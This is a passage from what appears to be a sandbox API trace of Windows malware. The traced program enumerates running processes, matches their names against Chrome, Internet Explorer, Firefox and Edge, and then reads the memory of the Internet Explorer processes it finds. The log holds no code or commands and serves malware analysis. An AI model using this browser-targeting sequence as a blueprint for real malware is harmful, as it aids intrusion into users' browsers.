	[0220.261] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.261] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0220.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4d24
	[0220.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.262] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0220.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.262] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.263] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0220.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.263] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.263] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0220.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4d28
	[0220.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.264] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0220.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.264] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.265] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0220.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.265] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.265] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0220.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4d2c
	[0220.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.266] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0220.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.266] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.267] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0220.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.267] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.267] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0220.268] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4d30
	[0220.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.268] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0220.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.268] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.268] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0220.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.269] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.269] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0220.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0220.270] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0220.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4d34
	[0220.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.270] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0220.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.271] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.272] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0220.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.272] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.273] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0220.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4d38
	[0220.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.274] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0220.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.274] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.274] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0220.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.275] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.275] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0220.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4d3c
	[0220.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.276] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0220.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.276] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.276] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0220.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.277] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.277] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0220.278] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4d40
	[0220.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.278] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0220.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.278] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.278] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0220.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.279] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.279] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0220.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4d44
	[0220.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.280] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0220.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.280] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.281] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0220.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.281] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.282] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0220.282] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4d48
	[0220.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.283] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0220.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.283] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.283] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0220.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.283] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.284] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0220.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4d4c
	[0220.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.284] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0220.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.285] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.285] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0220.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.286] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.286] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0220.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4d50
	[0220.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.287] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0220.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.287] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.288] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0220.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.289] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.289] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0220.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4d54
	[0220.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.290] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0220.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.290] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.290] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0220.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.291] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.291] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0220.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4d58
	[0220.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.292] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0220.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.292] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.292] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0220.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.293] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.293] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0220.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4d5c
	[0220.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.294] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0220.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.294] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.294] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0220.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.295] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.295] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0220.296] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4d60
	[0220.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.296] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0220.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.297] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.297] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0220.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.298] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.298] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0220.299] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4d64
	[0220.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.299] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0220.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.300] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.300] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0220.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.300] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.301] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0220.302] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4d68
	[0220.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.302] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0220.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.302] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.303] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0220.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.304] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.305] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0220.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4d6c
	[0220.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.306] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0220.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.306] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.307] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0220.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.307] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.308] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0220.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4d70
	[0220.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.308] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0220.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.309] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0220.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.309] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0220.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.309] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.309] NtQueryInformationProcess (in: ProcessHandle=0x4d70, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0220.310] ReadProcessMemory (in: hProcess=0x4d70, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0220.310] ReadProcessMemory (in: hProcess=0x4d70, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0220.310] ReadProcessMemory (in: hProcess=0x4d70, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0220.310] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0220.310] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0220.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4d74
	[0220.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.311] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0220.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.311] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0220.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.311] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0220.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.312] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.312] NtQueryInformationProcess (in: ProcessHandle=0x4d74, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0220.312] ReadProcessMemory (in: hProcess=0x4d74, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0220.312] ReadProcessMemory (in: hProcess=0x4d74, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0220.312] ReadProcessMemory (in: hProcess=0x4d74, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0220.312] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0220.313] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0220.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4d78
	[0220.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.313] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0220.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.314] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.314] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0220.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.314] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.314] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
